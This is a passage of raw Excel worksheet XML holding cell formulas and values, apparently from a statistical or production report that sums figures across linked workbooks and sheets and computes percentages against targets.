      <c r="I80" s="301">
        <f>H80+yc!I80</f>
        <v>0</v>
      </c>
      <c r="J80" s="301">
        <f>'[16]7'!$V$15</f>
        <v>0</v>
      </c>
      <c r="K80" s="194">
        <f>J80+'6'!K80</f>
        <v>0</v>
      </c>
      <c r="L80" s="301">
        <f>K80+yc!L80</f>
        <v>0</v>
      </c>
      <c r="M80" s="301">
        <f>'[16]7'!$Y$15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G81+'6'!H81</f>
        <v>0</v>
      </c>
      <c r="I81" s="301">
        <f>H81+yc!I81</f>
        <v>0</v>
      </c>
      <c r="J81" s="301"/>
      <c r="K81" s="194">
        <f>J81+'6'!K81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G82+'6'!H82</f>
        <v>0</v>
      </c>
      <c r="I82" s="301">
        <f>H82+yc!I82</f>
        <v>0</v>
      </c>
      <c r="J82" s="301"/>
      <c r="K82" s="194">
        <f>J82+'6'!K82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G83+'6'!H83</f>
        <v>0</v>
      </c>
      <c r="I83" s="301">
        <f>H83+yc!I83</f>
        <v>0</v>
      </c>
      <c r="J83" s="301"/>
      <c r="K83" s="194">
        <f>J83+'6'!K83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G84+'6'!H84</f>
        <v>0</v>
      </c>
      <c r="I84" s="301">
        <f>H84+yc!I84</f>
        <v>0</v>
      </c>
      <c r="J84" s="301"/>
      <c r="K84" s="194">
        <f>J84+'6'!K84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G85+'6'!H85</f>
        <v>0</v>
      </c>
      <c r="I85" s="301">
        <f>H85+yc!I85</f>
        <v>0</v>
      </c>
      <c r="J85" s="301"/>
      <c r="K85" s="194">
        <f>J85+'6'!K85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Z158"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="4" ySplit="4" topLeftCell="E47"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8/31</f>
        <v>0.258064516129032</v>
      </c>
      <c r="J2" s="180"/>
      <c r="K2" s="181"/>
      <c r="L2" s="180"/>
      <c r="M2" s="180"/>
      <c r="N2" s="182">
        <v>45999</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21988.06</v>
      </c>
      <c r="H5" s="194">
        <f>G5+'7'!H5</f>
        <v>171292.39</v>
      </c>
      <c r="I5" s="194">
        <f>H5+yc!I5</f>
        <v>6326158.42</v>
      </c>
      <c r="J5" s="194">
        <f>J21+J31+J41+J51+J61+J68+J79</f>
        <v>22477.6</v>
      </c>
      <c r="K5" s="194">
        <f>J5+'7'!K5</f>
        <v>182125.956</v>
      </c>
      <c r="L5" s="194">
        <f>K5+yc!L5</f>
        <v>6332197.087</v>
      </c>
      <c r="M5" s="194">
        <f>M21+M31+M41+M51+M61+M68+M79</f>
        <v>256634.258</v>
      </c>
      <c r="N5" s="195">
        <f>M5/374000*100</f>
        <v>68.6187855614972</v>
      </c>
      <c r="O5" s="196" t="s">
        <v>228</v>
      </c>
      <c r="P5" s="197" t="s">
        <v>229</v>
      </c>
      <c r="Q5" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R5" s="198">
        <f>'[10]8'!$W$101</f>
        <v>266.916666666667</v>
      </c>
      <c r="S5" s="198">
        <f>'[10]8'!$X$101</f>
        <v>271.807291666667</v>
      </c>
      <c r="T5" s="198">
        <f>'[10]8'!$Y$101</f>
        <v>260.360919975168</v>
      </c>
      <c r="U5" s="198">
        <f>'[10]8'!$T$101</f>
        <v>100</v>
      </c>
      <c r="V5" s="198">
        <f>'[10]8'!$U$101</f>
        <v>100</v>
      </c>
      <c r="W5" s="198">
        <f>'[10]8'!$V$101</f>
        <v>65.4887792397661</v>
      </c>
      <c r="X5" s="198">
        <f>'[10]8'!$Q$101</f>
        <v>24</v>
      </c>
      <c r="Y5" s="198">
        <f>'[10]8'!$R$101</f>
        <v>192</v>
      </c>
      <c r="Z5" s="198">
        <f>'[10]8'!$S$101</f>
        <v>5375.319</v>
      </c>
    </row>
    <row r="6" ht="15.75" customHeight="1" spans="1:26">
      <c r="A6" s="191"/>
      <c r="B6" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C6" s="193" t="s">
        <v>232</v>
      </c>
      <c r="D6" s="193"/>
      <c r="E6" s="194"/>
      <c r="F6" s="194">
        <f>'[10]8'!$D$23+'[11]8'!$D$17+'[12]8'!$D$17+'[13]8'!$D$25+'[14]8'!$D$8+'[14]8'!$D$15+'[15]8'!$D$7</f>
        <v>32112.84</v>
      </c>
      <c r="G6" s="194">
        <f>'[10]8'!$E$23+'[11]8'!$E$17+'[12]8'!$E$17+'[13]8'!$E$25+'[14]8'!$E$8+'[14]8'!$E$15+'[15]8'!$E$7</f>
        <v>0</v>
      </c>
      <c r="H6" s="194">
        <f>G6+'7'!H6</f>
        <v>2107</v>
      </c>
      <c r="I6" s="194">
        <f>H6+yc!I6</f>
        <v>278456.96</v>
      </c>
      <c r="J6" s="194">
        <f>'[10]8'!$I$23+'[11]8'!$I$17+'[12]8'!$I$17+'[13]8'!$I$25+'[14]8'!$E$23+'[14]8'!$E$30+'[15]8'!$H$7</f>
        <v>509.48</v>
      </c>
      <c r="K6" s="194">
        <f>J6+'7'!K6</f>
        <v>5786.2</v>
      </c>
      <c r="L6" s="194">
        <f>K6+yc!L6</f>
        <v>267983.9</v>
      </c>
      <c r="M6" s="194">
        <f>'[10]8'!$L$23+'[11]8'!$L$17+'[12]8'!$L$17+'[13]8'!$L$25+'[14]8'!$H$23+'[14]8'!$H$30+'[15]8'!$K$7</f>
        <v>28433.64</v>
      </c>
      <c r="N6" s="195"/>
      <c r="O6" s="199"/>
      <c r="P6" s="200"/>
      <c r="Q6" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R6" s="198">
        <f>'[10]8'!$W$102</f>
        <v>0</v>
      </c>
      <c r="S6" s="198">
        <f>'[10]8'!$X$102</f>
        <v>0</v>
      </c>
      <c r="T6" s="198">
        <f>'[10]8'!$Y$102</f>
        <v>240.280205356462</v>
      </c>
      <c r="U6" s="198">
        <f>'[10]8'!$T$102</f>
        <v>0</v>
      </c>
      <c r="V6" s="198">
        <f>'[10]8'!$U$102</f>
        <v>0</v>
      </c>
      <c r="W6" s="198">
        <f>'[10]8'!$V$102</f>
        <v>34.6637305068226</v>
      </c>
      <c r="X6" s="198">
        <f>'[10]8'!$Q$102</f>
        <v>0</v>
      </c>
      <c r="Y6" s="198">
        <f>'[10]8'!$R$102</f>
        <v>0</v>
      </c>
      <c r="Z6" s="198">
        <f>'[10]8'!$S$102</f>
        <v>2845.199</v>
      </c>
    </row>
    <row r="7" ht="15.75" customHeight="1" spans="1:26">
      <c r="A7" s="191"/>
      <c r="B7" s="191"/>
      <c r="C7" s="201" t="s">
        <v>331</v>
      </c>
      <c r="D7" s="201"/>
      <c r="E7" s="194"/>
      <c r="F7" s="194">
        <f>'[12]8'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G7" s="194">
        <f>'[12]8'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H7" s="194">
        <f>G7+'7'!H7</f>
        <v>0</v>
      </c>
      <c r="I7" s="194">
        <f>H7+yc!I7</f>
        <v>0</v>
      </c>
      <c r="J7" s="194">
        <f>'[12]8'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K7" s="194">
        <f>J7+'7'!K7</f>
        <v>0</v>
      </c>
      <c r="L7" s="194">
        <f>K7+yc!L7</f>
        <v>0</v>
      </c>
      <c r="M7" s="194">
        <f>'[12]8'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N7" s="195"/>
      <c r="O7" s="199"/>
      <c r="P7" s="200"/>
      <c r="Q7" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R7" s="202">
        <f>'[10]8'!$W$107</f>
        <v>136.760925449871</v>
      </c>
      <c r="S7" s="202">
        <f>'[10]8'!$X$107</f>
        <v>127.05471740599</v>
      </c>
      <c r="T7" s="198">
        <f>'[10]8'!$Y$107</f>
        <v>131.763037777994</v>
      </c>
      <c r="U7" s="198">
        <f>'[10]8'!$T$107</f>
        <v>48.625</v>
      </c>
      <c r="V7" s="198">
        <f>'[10]8'!$U$107</f>
        <v>46.2604166666667</v>
      </c>
      <c r="W7" s="198">
        <f>'[10]8'!$V$107</f>
        <v>31.3626949317738</v>
      </c>
      <c r="X7" s="198">
        <f>'[10]8'!$Q$107</f>
        <v>11.67</v>
      </c>
      <c r="Y7" s="198">
        <f>'[10]8'!$R$107</f>
        <v>88.82</v>
      </c>
      <c r="Z7" s="198">
        <f>'[10]8'!$S$107</f>
        <v>2574.25</v>
      </c>
    </row>
    <row r="8" ht="15.75" customHeight="1" spans="1:26">
      <c r="A8" s="191"/>
      <c r="B8" s="191"/>
      <c r="C8" s="201" t="s">
        <v>236</v>
      </c>
      <c r="D8" s="201"/>
      <c r="E8" s="194"/>
      <c r="F8" s="194">
        <f>'[10]8'!$D$27+'[11]8'!$D$18+'[13]8'!$D$26+'[14]8'!$D$10+'[14]8'!$D$17+'[15]8'!$D$9</f>
        <v>41879.9</v>
      </c>
      <c r="G8" s="194">
        <f>'[10]8'!$E$27+'[11]8'!$E$18+'[13]8'!$E$26+'[14]8'!$E$10+'[14]8'!$E$17+'[15]8'!$E$9</f>
        <v>4542</v>
      </c>
      <c r="H8" s="194">
        <f>G8+'7'!H8</f>
        <v>17194</v>
      </c>
      <c r="I8" s="194">
        <f>H8+yc!I8</f>
        <v>542730.99</v>
      </c>
      <c r="J8" s="194">
        <f>'[10]8'!$I$27+'[11]8'!$I$18+'[13]8'!$I$26+'[14]8'!$E$25+'[14]8'!$E$32+'[15]8'!$H$9</f>
        <v>2612.35</v>
      </c>
      <c r="K8" s="194">
        <f>J8+'7'!K8</f>
        <v>20080.91</v>
      </c>
      <c r="L8" s="194">
        <f>K8+yc!L8</f>
        <v>527825.62</v>
      </c>
      <c r="M8" s="194">
        <f>'[10]8'!$L$27+'[11]8'!$L$18+'[13]8'!$L$26+'[14]8'!$H$25+'[14]8'!$H$32+'[15]8'!$K$9</f>
        <v>38992.99</v>
      </c>
      <c r="N8" s="195"/>
      <c r="O8" s="199"/>
      <c r="P8" s="200"/>
      <c r="Q8" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R8" s="198">
        <f>'[10]8'!$W$108</f>
        <v>135.841081994928</v>
      </c>
      <c r="S8" s="198">
        <f>'[10]8'!$X$108</f>
        <v>129.030832136148</v>
      </c>
      <c r="T8" s="198">
        <f>'[10]8'!$Y$108</f>
        <v>127.487824284978</v>
      </c>
      <c r="U8" s="198">
        <f>'[10]8'!$T$108</f>
        <v>49.2916666666667</v>
      </c>
      <c r="V8" s="198">
        <f>'[10]8'!$U$108</f>
        <v>47.1302083333333</v>
      </c>
      <c r="W8" s="198">
        <f>'[10]8'!$V$108</f>
        <v>27.8672027290448</v>
      </c>
      <c r="X8" s="198">
        <f>'[10]8'!$Q$108</f>
        <v>11.83</v>
      </c>
      <c r="Y8" s="198">
        <f>'[10]8'!$R$108</f>
        <v>90.49</v>
      </c>
      <c r="Z8" s="198">
        <f>'[10]8'!$S$108</f>
        <v>2287.34</v>
      </c>
    </row>
    <row r="9" ht="15.75" customHeight="1" spans="1:26">
      <c r="A9" s="191"/>
      <c r="B9" s="191"/>
      <c r="C9" s="201" t="s">
        <v>238</v>
      </c>
      <c r="D9" s="201"/>
      <c r="E9" s="194"/>
      <c r="F9" s="194">
        <f>'[10]8'!$D$24+'[11]8'!$D$19+'[12]8'!$D$20+'[13]8'!$D$27+'[14]8'!$D$11+'[14]8'!$D$18+'[15]8'!$D$10</f>
        <v>110865.712</v>
      </c>
      <c r="G9" s="194">
        <f>'[10]8'!$E$24+'[11]8'!$E$19+'[12]8'!$E$20+'[13]8'!$E$27+'[14]8'!$E$11+'[14]8'!$E$18+'[15]8'!$E$10</f>
        <v>12715</v>
      </c>
      <c r="H9" s="194">
        <f>G9+'7'!H9</f>
        <v>125046</v>
      </c>
      <c r="I9" s="194">
        <f>H9+yc!I9</f>
        <v>4260434.88</v>
      </c>
      <c r="J9" s="194">
        <f>'[10]8'!$I$24+'[11]8'!$I$19+'[12]8'!$I$20+'[13]8'!$I$27+'[14]8'!$E$26+'[14]8'!$E$33+'[15]8'!$H$10</f>
        <v>15610.95</v>
      </c>
      <c r="K9" s="194">
        <f>J9+'7'!K9</f>
        <v>121502.816</v>
      </c>
      <c r="L9" s="194">
        <f>K9+yc!L9</f>
        <v>4218981.627</v>
      </c>
      <c r="M9" s="194">
        <f>'[10]8'!$L$24+'[11]8'!$L$19+'[12]8'!$L$20+'[13]8'!$L$27+'[14]8'!$H$26+'[14]8'!$H$33+'[15]8'!$K$10</f>
        <v>114408.896</v>
      </c>
      <c r="N9" s="195"/>
      <c r="O9" s="199"/>
      <c r="P9" s="200"/>
      <c r="Q9" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R9" s="198">
        <f>'[10]8'!$W$109</f>
        <v>293.444444444444</v>
      </c>
      <c r="S9" s="198">
        <f>'[10]8'!$X$109</f>
        <v>272.595281306715</v>
      </c>
      <c r="T9" s="198">
        <f>'[10]8'!$Y$109</f>
        <v>271.352232336368</v>
      </c>
      <c r="U9" s="198">
        <f>'[10]8'!$T$109</f>
        <v>37.5</v>
      </c>
      <c r="V9" s="198">
        <f>'[10]8'!$U$109</f>
        <v>45.9166666666667</v>
      </c>
      <c r="W9" s="198">
        <f>'[10]8'!$V$109</f>
        <v>35.1334064327485</v>
      </c>
      <c r="X9" s="198">
        <f>'[10]8'!$Q$109</f>
        <v>9</v>
      </c>
      <c r="Y9" s="198">
        <f>'[10]8'!$R$109</f>
        <v>88.16</v>
      </c>
      <c r="Z9" s="198">
        <f>'[10]8'!$S$109</f>
        <v>2883.74999999999</v>
      </c>
    </row>
    <row r="10" ht="15.75" customHeight="1" spans="1:26">
      <c r="A10" s="191"/>
      <c r="B10" s="191"/>
      <c r="C10" s="201" t="s">
        <v>295</v>
      </c>
      <c r="D10" s="201"/>
      <c r="E10" s="194"/>
      <c r="F10" s="194">
        <f>'[10]8'!$D$25+'[11]8'!$D$20+'[12]8'!$D$21+'[13]8'!$D$28+'[14]8'!$D$12+'[14]8'!$D$19+'[15]8'!$D$11</f>
        <v>61206.942</v>
      </c>
      <c r="G10" s="194">
        <f>'[10]8'!$E$25+'[11]8'!$E$20+'[12]8'!$E$21+'[13]8'!$E$28+'[14]8'!$E$12+'[14]8'!$E$19+'[15]8'!$E$11</f>
        <v>4082</v>
      </c>
      <c r="H10" s="194">
        <f>G10+'7'!H10</f>
        <v>17853</v>
      </c>
      <c r="I10" s="194">
        <f>H10+yc!I10</f>
        <v>935380.17</v>
      </c>
      <c r="J10" s="194">
        <f>'[10]8'!$I$25+'[11]8'!$I$20+'[12]8'!$I$21+'[13]8'!$I$28+'[14]8'!$E$27+'[14]8'!$E$34+'[15]8'!$H$11</f>
        <v>2274.26</v>
      </c>
      <c r="K10" s="194">
        <f>J10+'7'!K10</f>
        <v>23609.1</v>
      </c>
      <c r="L10" s="194">
        <f>K10+yc!L10</f>
        <v>920837.82</v>
      </c>
      <c r="M10" s="194">
        <f>'[10]8'!$L$25+'[11]8'!$L$20+'[12]8'!$L$21+'[13]8'!$L$28+'[14]8'!$H$27+'[14]8'!$H$34+'[15]8'!$K$11</f>
        <v>55450.842</v>
      </c>
      <c r="N10" s="195"/>
      <c r="O10" s="199"/>
      <c r="P10" s="200"/>
      <c r="Q10" s="193" t="s">
        <v>296</v>
      </c>
      <c r="R10" s="198">
        <f>'[10]8'!$W$110</f>
        <v>272.131147540984</v>
      </c>
      <c r="S10" s="198">
        <f>'[10]8'!$X$110</f>
        <v>272.936566250306</v>
      </c>
      <c r="T10" s="198">
        <f>'[10]8'!$Y$110</f>
        <v>268.910367251479</v>
      </c>
      <c r="U10" s="198">
        <f>'[10]8'!$T$110</f>
        <v>7.625</v>
      </c>
      <c r="V10" s="198">
        <f>'[10]8'!$U$110</f>
        <v>21.265625</v>
      </c>
      <c r="W10" s="198">
        <f>'[10]8'!$V$110</f>
        <v>34.1726364522417</v>
      </c>
      <c r="X10" s="198">
        <f>'[10]8'!$Q$110</f>
        <v>1.83</v>
      </c>
      <c r="Y10" s="198">
        <f>'[10]8'!$R$110</f>
        <v>40.83</v>
      </c>
      <c r="Z10" s="198">
        <f>'[10]8'!$S$110</f>
        <v>2804.89</v>
      </c>
    </row>
    <row r="11" ht="15.75" customHeight="1" spans="1:26">
      <c r="A11" s="191"/>
      <c r="B11" s="191"/>
      <c r="C11" s="201" t="s">
        <v>297</v>
      </c>
      <c r="D11" s="201"/>
      <c r="E11" s="194"/>
      <c r="F11" s="194">
        <f>'[10]8'!$D$26+'[11]8'!$D$21+'[12]8'!$D$19+'[13]8'!$D$29+'[14]8'!$D$13+'[14]8'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G11" s="194">
        <f>'[10]8'!$E$26+'[11]8'!$E$21+'[12]8'!$E$19+'[13]8'!$E$29+'[14]8'!$E$13+'[14]8'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H11" s="194">
        <f>G11+'7'!H11</f>
        <v>153.81</v>
      </c>
      <c r="I11" s="194">
        <f>H11+yc!I11</f>
        <v>153.81</v>
      </c>
      <c r="J11" s="194">
        <f>'[10]8'!$I$26+'[11]8'!$I$21+'[12]8'!$I$19+'[13]8'!$I$29+'[14]8'!$E$28+'[14]8'!$E$35</f>
        <v>0</v>
      </c>
      <c r="K11" s="194">
        <f>J11+'7'!K11</f>
        <v>0</v>
      </c>
      <c r="L11" s="194">
        <f>K11+yc!L11</f>
        <v>0</v>
      </c>
      <c r="M11" s="194">
        <f>'[10]8'!$L$26+'[11]8'!$L$21+'[12]8'!$L$19+'[13]8'!$L$29+'[14]8'!$H$28+'[14]8'!$H$35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12608</v>
      </c>
      <c r="H12" s="194">
        <f>G12+'7'!H12</f>
        <v>79481.0000000002</v>
      </c>
      <c r="I12" s="194">
        <f>H12+yc!I12</f>
        <v>5021872.25</v>
      </c>
      <c r="J12" s="194">
        <f>J22+J32+J42+J52+J62+J69</f>
        <v>18924.12</v>
      </c>
      <c r="K12" s="194">
        <f>J12+'7'!K12</f>
        <v>145135.538</v>
      </c>
      <c r="L12" s="194">
        <f>K12+yc!L12</f>
        <v>5174241.914</v>
      </c>
      <c r="M12" s="194">
        <f>M22+M32+M42+M52+M62+M69</f>
        <v>326074.16700005</v>
      </c>
      <c r="N12" s="205">
        <f>M12/439000*100</f>
        <v>74.2765756264351</v>
      </c>
      <c r="O12" s="199"/>
      <c r="P12" s="200"/>
      <c r="Q12" s="203" t="s">
        <v>299</v>
      </c>
      <c r="R12" s="204">
        <f>'[16]8'!$W$40</f>
        <v>0</v>
      </c>
      <c r="S12" s="204">
        <f>'[16]8'!$X$40</f>
        <v>0</v>
      </c>
      <c r="T12" s="204">
        <f>'[16]8'!$Y$40</f>
        <v>0</v>
      </c>
      <c r="U12" s="204">
        <f>'[16]8'!$T$40</f>
        <v>0</v>
      </c>
      <c r="V12" s="204">
        <f>'[16]8'!$U$40</f>
        <v>0</v>
      </c>
      <c r="W12" s="204">
        <f>'[16]8'!$V$40</f>
        <v>0</v>
      </c>
      <c r="X12" s="204">
        <f>'[16]8'!$Q$40</f>
        <v>0</v>
      </c>
      <c r="Y12" s="204">
        <f>'[16]8'!$R$40</f>
        <v>0</v>
      </c>
      <c r="Z12" s="204">
        <f>'[16]8'!$S$40</f>
        <v>0</v>
      </c>
    </row>
    <row r="13" ht="15.75" customHeight="1" spans="1:26">
      <c r="A13" s="191"/>
      <c r="B13" s="193"/>
      <c r="C13" s="193"/>
      <c r="D13" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E13" s="194">
        <f>E23+E33+E43+E53+E63+E70</f>
        <v>0</v>
      </c>
      <c r="F13" s="194">
        <f>F23+F33+F43+F53+F63+F70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="G13" s="194">
        <f>G23+G33+G43+G53+G63+G70</f>
        <v>0</v>
      </c>
      <c r="H13" s="194">
        <f>G13+'7'!H13</f>
        <v>0</v>
      </c>
      <c r="I13" s="194">
        <f>H13+yc!I13</f>
        <v>0</v>
      </c>
      <c r="J13" s="194">
        <f>J23+J33+J43+J53+J63+J70</f>
        <v>0</v>
      </c>
      <c r="K13" s="194">
        <f>J13+'7'!K13</f>
        <v>0</v>
      </c>
      <c r="L13" s="194">
        <f>K13+yc!L13</f>
        <v>0</v>
      </c>
      <c r="M13" s="194">
        <f>M23+M33+M43+M53+M63+M70</f>
        <v>-2.00373051484348e-12</v>
      </c>
      <c r="N13" s="207">
        <f>(M12+M13)/(315000+80000+150000)*100</f>
        <v>59.8301223853303</v>
      </c>
      <c r="O13" s="199"/>
      <c r="P13" s="208" t="s">
        <v>237</v>
      </c>
      <c r="Q13" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R13" s="209">
        <f>'[11]8'!$W$68</f>
        <v>258.416666666667</v>
      </c>
      <c r="S13" s="209">
        <f>'[11]8'!$X$68</f>
        <v>257.490566037736</v>
      </c>
      <c r="T13" s="209">
        <f>'[11]8'!$Y$68</f>
        <v>266.220835979615</v>
      </c>
      <c r="U13" s="209">
        <f>'[11]8'!$T$68</f>
        <v>100</v>
      </c>
      <c r="V13" s="209">
        <f>'[11]8'!$U$68</f>
        <v>55.2083333333333</v>
      </c>
      <c r="W13" s="209">
        <f>'[11]8'!$V$68</f>
        <v>71.1687378167641</v>
      </c>
      <c r="X13" s="210" t="str">
        <f>'[11]8'!$Q$68</f>
        <v>24.00</v>
      </c>
      <c r="Y13" s="210" t="str">
        <f>'[11]8'!$R$68</f>
        <v>106.00</v>
      </c>
      <c r="Z13" s="210" t="str">
        <f>'[11]8'!$S$68</f>
        <v>5841.53</v>
      </c>
    </row>
    <row r="14" ht="15.75" customHeight="1" spans="1:26">
      <c r="A14" s="191"/>
      <c r="B14" s="193"/>
      <c r="C14" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D14" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E14" s="194">
        <f>E24+E34+E44+E54</f>
        <v>0</v>
      </c>
      <c r="F14" s="194">
        <f>F24+F34+F44+F54</f>
        <v>0</v>
      </c>
      <c r="G14" s="194">
        <f>G24+G34+G44+G54+G62</f>
        <v>3283</v>
      </c>
      <c r="H14" s="194">
        <f>G14+'7'!H14</f>
        <v>18023</v>
      </c>
      <c r="I14" s="194">
        <f>H14+yc!I14</f>
        <v>982566.676</v>
      </c>
      <c r="J14" s="194">
        <f>J24+J34+J44+J54+J62</f>
        <v>7096.97</v>
      </c>
      <c r="K14" s="194">
        <f>J14+'7'!K14</f>
        <v>44692.802</v>
      </c>
      <c r="L14" s="194">
        <f>K14+yc!L14</f>
        <v>1837636.908</v>
      </c>
      <c r="M14" s="194">
        <f>M24+M34+M44+M54</f>
        <v>65896.78</v>
      </c>
      <c r="N14" s="211"/>
      <c r="O14" s="199"/>
      <c r="P14" s="208"/>
      <c r="Q14" s="193" t="s">
        <v>239</v>
      </c>
      <c r="R14" s="209">
        <f>'[11]8'!$W$71</f>
        <v>226.35609444799</v>
      </c>
      <c r="S14" s="209">
        <f>'[11]8'!$X$71</f>
        <v>222.958891560747</v>
      </c>
      <c r="T14" s="209">
        <f>'[11]8'!$Y$71</f>
        <v>213.701283232414</v>
      </c>
      <c r="U14" s="209">
        <f>'[11]8'!$T$71</f>
        <v>65.2916666666667</v>
      </c>
      <c r="V14" s="209">
        <f>'[11]8'!$U$71</f>
        <v>45.484375</v>
      </c>
      <c r="W14" s="209">
        <f>'[11]8'!$V$71</f>
        <v>50.119761208577</v>
      </c>
      <c r="X14" s="210" t="str">
        <f>'[11]8'!$Q$71</f>
        <v>15.67</v>
      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]8'!$R$71</f>
        <v>87.33</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]8'!$S$71</f>
        <v>4113.83</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'7'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>112.75</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'7'!K15</f>
        <v>1814.846</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>116571.346</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]8'!$W$72</f>
        <v>61.1875</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]8'!$X$72</f>
        <v>64.5901639344262</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]8'!$Y$72</f>
        <v>61.3569711538462</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]8'!$T$72</f>
        <v>66.6666666666667</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]8'!$U$72</f>
        <v>47.65625</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]8'!$V$72</f>
        <v>50.682261208577</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]8'!$Q$72</f>
        <v>16.00</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]8'!$R$72</f>
        <v>91.50</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]8'!$S$72</f>
        <v>4160.00</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'7'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'7'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]8'!$W$73</f>
        <v>65.125</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]8'!$X$73</f>
        <v>64.9289617486339</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]8'!$Y$73</f>
        <v>62.9596265614359</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]8'!$T$73</f>
        <v>66.6666666666667</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]8'!$U$73</f>
        <v>47.65625</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]8'!$V$73</f>
        <v>52.2383040935673</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]8'!$Q$73</f>
        <v>16.00</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]8'!$R$73</f>
        <v>91.50</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]8'!$S$73</f>
        <v>4287.72</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'7'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'7'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]8'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]8'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]8'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]8'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]8'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]8'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]8'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]8'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]8'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
